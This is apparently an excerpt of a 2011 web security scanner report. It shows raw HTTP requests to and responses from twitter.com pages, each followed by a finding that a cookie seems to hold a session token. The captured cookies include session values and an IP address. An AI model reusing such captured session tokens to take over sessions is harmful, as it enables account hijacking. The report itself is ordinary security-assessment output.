GET /Trackgals HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:14 GMT Server: hi Status: 200 OK X-Transaction: 1296265994-35762-9331 ETag: "084cf3c9b164746f0254081f5cf026a3" Last-Modified: Sat, 29 Jan 2011 01:53:14 GMT X-Runtime: 0.00950 Content-Type: text/html; charset=utf-8 Content-Length: 52317 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Trackgals/ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:21 GMT Server: hi Status: 200 OK X-Transaction: 1296265281-91506-33293 ETag: "1be6fcf55b971925b5829f3dff23d7be" Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT X-Runtime: 0.00823 Content-Type: text/html; charset=utf-8 Content-Length: 52701 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_juliannemoore HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:22 GMT Server: hi Status: 200 OK X-Transaction: 1296265282-32409-42560 ETag: "1befeb7740b62870da7fe07d809fb4d6" Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT X-Runtime: 0.01153 Content-Type: text/html; charset=utf-8 Content-Length: 34492 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:18 GMT Server: hi Status: 200 OK X-Transaction: 1296225078-81361-59906 ETag: "ab332c29e3804246af65d489155e144e" Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT X-Runtime: 0.18722 Content-Type: text/html; charset=utf-8 Content-Length: 15164 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZThlMDExYjJmNmQzODczNjgwYWY4M2RiNzlhYTY5%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5f458640ebcf7c125bea2d557117ee384f19570f; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/contact HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:18 GMT Server: hi Status: 200 OK X-Transaction: 1296225078-5855-53327 ETag: "ee4327c585f1140407cbc5106769d4eb" Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT X-Runtime: 0.02946 Content-Type: text/html; charset=utf-8 Content-Length: 10974 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/resources HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:19 GMT Server: hi Status: 200 OK X-Transaction: 1296225079-3941-56167 ETag: "b3415b3a1e4db6b10e96993fd3ced6dd" Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT X-Runtime: 0.02948 Content-Type: text/html; charset=utf-8 Content-Length: 12672 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTdlYjkyMDk3OTcwMTQxNTFlMjM2ZmE3YmE4ODJj%250ANmM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5ad46e0e7e340cae0b9f7ca2011b39284030c689; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/complete HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:38 GMT Server: hi Status: 200 OK X-Transaction: 1296224738-66922-55667 ETag: "eedf9b80f78cbd1a5f2a1c6e52bbc763" Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT X-Runtime: 0.03729 Content-Type: text/html; charset=utf-8 Content-Length: 9562 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlODI5MmUyYjNjZTVmMGNlMzU4NGJlM2JjNGVkMTQ1%250AYTA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--9ac191e704e10670dc258c58c1b2e5f1e8b10885; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/profile_image/malsup HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 302 Found Date: Fri, 28 Jan 2011 14:25:38 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup X-Runtime: 0.00294 Content-Type: text/html; charset=utf-8 Content-Length: 147 Cache-Control: no-cache, max-age=300 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIjRodHRwOi8vdHdpdHRlci5jb20vYWNjb3VudC9w%250Acm9maWxlX2ltYWdlL21hbHN1cDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0%250AYWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--efeb79c67fc2a12bf68668d2c6c44713e044d3b4; domain=.twitter.com; path=/ Expires: Fri, 28 Jan 2011 14:30:36 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/resend_password HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:38 GMT Server: hi Status: 200 OK X-Transaction: 1296224738-99420-18584 ETag: "f922c6202d9a9e6c0d31ac6afdb14eff" Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT X-Runtime: 0.02589 Content-Type: text/html; charset=utf-8 Content-Length: 9745 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMDI3MTAzYTcyMjcyM2VhZDQyN2NiOGRlNTEyNWE5%250AZTc6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c7b8267380c61b856a14710cd449961d09a51a3c; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ajpiano HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-9839-24776 ETag: "6cfb51a84c8ef82cfc30accecbfd12df" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01348 Content-Type: text/html; charset=utf-8 Content-Length: 48953 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /androidnewsblog HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-13968-5956 ETag: "b0e4ae48560abd6de3188c44a0de9618" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01122 Content-Type: text/html; charset=utf-8 Content-Length: 49638 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /backstreetboys HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:48 GMT Server: hi Status: 200 OK X-Transaction: 1296265308-18449-44248 ETag: "470b046c74671df35cc91c1d8792ddb5" Last-Modified: Sat, 29 Jan 2011 01:41:48 GMT X-Runtime: 0.01227 Content-Type: text/html; charset=utf-8 Content-Length: 47038 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: 